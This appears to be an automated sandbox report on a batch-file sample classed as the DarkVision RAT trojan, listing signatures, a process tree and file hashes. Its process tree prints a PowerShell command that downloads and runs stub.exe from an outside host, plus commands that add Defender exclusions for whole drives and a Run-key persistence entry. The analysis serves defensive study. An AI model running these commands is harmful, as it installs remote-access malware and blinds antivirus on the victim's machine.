Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2024 21:34
Static task
static1
Behavioral task
behavioral1
Sample
sushi/Installer.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sushi/Installer.bat
Resource
win10v2004-20241007-en
General
-
Target
sushi/Installer.bat
-
Size
65B
-
MD5
9234614a70c0c02829fbad081a57eae5
-
SHA1
4058c1a07df74ec328ac5a81e7fd13c60072aea7
-
SHA256
4c87cf865dac4712ce5c86bc0ede65060f5b4058c3c48bcf145b54eed2ecd9dd
-
SHA512
3c036df40c6f94c7fdea5b7b80bffbe8d9a16cfdc632e447955c5fe4167be5c9954d5f33e81afc47189078210fba9245fbcbbc7f0378f1efcb3e4cb6ccd54801
Malware Config
Signatures
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 22 1992 powershell.exe 23 1992 powershell.exe -
pid Process 1592 powershell.exe 1868 powershell.exe 4580 powershell.exe 2836 powershell.exe 1992 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation svhost.exe -
Executes dropped EXE 3 IoCs
pid Process 1412 account.tmp 2180 stub.exe 4428 svhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{AB1F3E47-AEF1-400E-A108-233A046C3A34} = "C:\\ProgramData\\Resources\\svhost.exe {69CF428B-78D4-49A9-B9AB-B631EBDB1D7A}" svhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\NSRS\unins000.dat account.tmp File created C:\Program Files (x86)\NSRS\is-BL13V.tmp account.tmp File opened for modification C:\Program Files (x86)\NSRS\unins000.dat account.tmp -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language account.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language account.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1592 powershell.exe 1592 powershell.exe 4580 powershell.exe 4580 powershell.exe 1992 powershell.exe 1992 powershell.exe 2836 powershell.exe 2836 powershell.exe 1868 powershell.exe 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1412 account.tmp -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 5072 wrote to memory of 3092 5072 cmd.exe 83 PID 5072 wrote to memory of 3092 5072 cmd.exe 83 PID 3092 wrote to memory of 3236 3092 cmd.exe 85 PID 3092 wrote to memory of 3236 3092 cmd.exe 85 PID 3092 wrote to memory of 3236 3092 cmd.exe 85 PID 3236 wrote to memory of 1412 3236 account.exe 86 PID 3236 wrote to memory of 1412 3236 account.exe 86 PID 3236 wrote to memory of 1412 3236 account.exe 86 PID 1412 wrote to memory of 1592 1412 account.tmp 88 PID 1412 wrote to memory of 1592 1412 account.tmp 88 PID 1412 wrote to memory of 1592 1412 account.tmp 88 PID 1592 wrote to memory of 4580 1592 powershell.exe 90 PID 1592 wrote to memory of 4580 1592 powershell.exe 90 PID 1592 wrote to memory of 4580 1592 powershell.exe 90 PID 3092 wrote to memory of 1992 3092 cmd.exe 95 PID 3092 wrote to memory of 1992 3092 cmd.exe 95 PID 3092 wrote to memory of 2180 3092 cmd.exe 97 PID 3092 wrote to memory of 2180 3092 cmd.exe 97 PID 2180 wrote to memory of 3200 2180 stub.exe 98 PID 2180 wrote to memory of 3200 2180 stub.exe 98 PID 2180 wrote to memory of 4428 2180 stub.exe 100 PID 2180 wrote to memory of 4428 2180 stub.exe 100 PID 3200 wrote to memory of 2836 3200 cmd.exe 101 PID 3200 wrote to memory of 2836 3200 cmd.exe 101 PID 4428 wrote to memory of 3440 4428 svhost.exe 102 PID 4428 wrote to memory of 3440 4428 svhost.exe 102 PID 3440 wrote to memory of 1868 3440 cmd.exe 104 PID 3440 wrote to memory of 1868 3440 cmd.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sushi\Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\cmd.execmd /c "classes\avatar.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe"C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\is-G05FG.tmp\account.tmp"C:\Users\Admin\AppData\Local\Temp\is-G05FG.tmp\account.tmp" /SL5="$802A0,845894,845824,C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\is-K5O0B.tmp\1.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri http://sushifactory.uk/stub.exe -OutFile C:\Users\Admin\AppData\Local\Temp\stub.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\stub.exe"C:\Users\Admin\AppData\Local\Temp\stub.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\ProgramData\Resources\svhost.exe"C:\ProgramData\Resources\svhost.exe" {574245A9-B969-4088-926C-5F5F4438445F}4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'5⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD549e7d5f2a296b59afec08bc314bed998
SHA17f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
1KB
MD59a8fa91d86242afd75056cc0d9b6aac1
SHA11d1e73e490c13ca09fb7fa97864f0beb1c376cf3
SHA256ddecaf6b006d384e9c69e46126a9fa47d177e467f1bf6aa47e4d53e1ff06abdc
SHA51203ef981dbacb5b20b5ef32a9a594e38d862c1fa27204e0223b7c42d611d1c2657b8a59763beb6c7516cf717c21543c648ead89bcad0b4d7a26675cf86ea1b1c4
-
Filesize
944B
MD54cb59d549e8c5d613ea4b7524088528a
SHA15bdfb9bc4920177a9e5d4b9c93df65383353ab22
SHA256a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a
SHA512a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52
-
Filesize
11KB
MD5c1e6b57ab7d30f497ccdc1fa1f7853b4
SHA10c608353d3ff00e76d1cafc5d2be32bbda7dfc85
SHA256dc5d7d04b2c561ceeab376927cdedeed551a6e82bd8c597f470c55085f6300e8
SHA5129a247cc894d2cfe03e71f1f3dfd9a4706a863d350f8adc19cf8237895e6bf664c7a7f417360e282888330377979b7cbfa4cc6b3268a1d1a043d63854bd819183
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD5035e56973a32721ed623f2ecd605571e
SHA1cb6969652265370eaca3dcf88f6e743105510e30
SHA256f56e4fd4dd3e20a106395f525f4a2e2c07416c62ab022215c8dc4fef2b519729
SHA512bd16344bb2957bead325acbb6a23b029ad61b7de4d1baf159ecf2ace3f6f7d0231e3c6264defa6c2d99ac9b894f1001eeceee0d0c3cf45c071b9b917da1c46fb
-
Filesize
59B
MD5d541ca594d1f7f4e7e410dab77d5b9a1
SHA14ee8b70929e9ba694a1cf4bbd167e267df1612aa
SHA256e58ece60621ee71f33fc205dec39d17be6a2956fb144b66d9c0ffefd70f7cc17
SHA51253c0806bbd7d9819f5b8f7fe3905977f06597004b6f4f2eafc980504e9a8f7a3d3ad34fe207a227f1ca5009a2199a03c77a834620ed6ae9e8d96754d1affd7ea
-
Filesize
453KB
MD5daad12d6bdbd2c84670dde98d4578cac
SHA1af9621dce5b7b42ff4407ae2917ee10b977d9fa6
SHA2563f2eb38466e631cbd44b5223a3ee41e56490d114fee83aa2ce075b076551c5cd
SHA512b48daf7b10f27ce2748eb81d254f6265d58f612c73f54e6290cc56cc24f3ddb84372a802deffbf85ef7246d365454a3bad096f25ccdd7edbe39dce74145c8908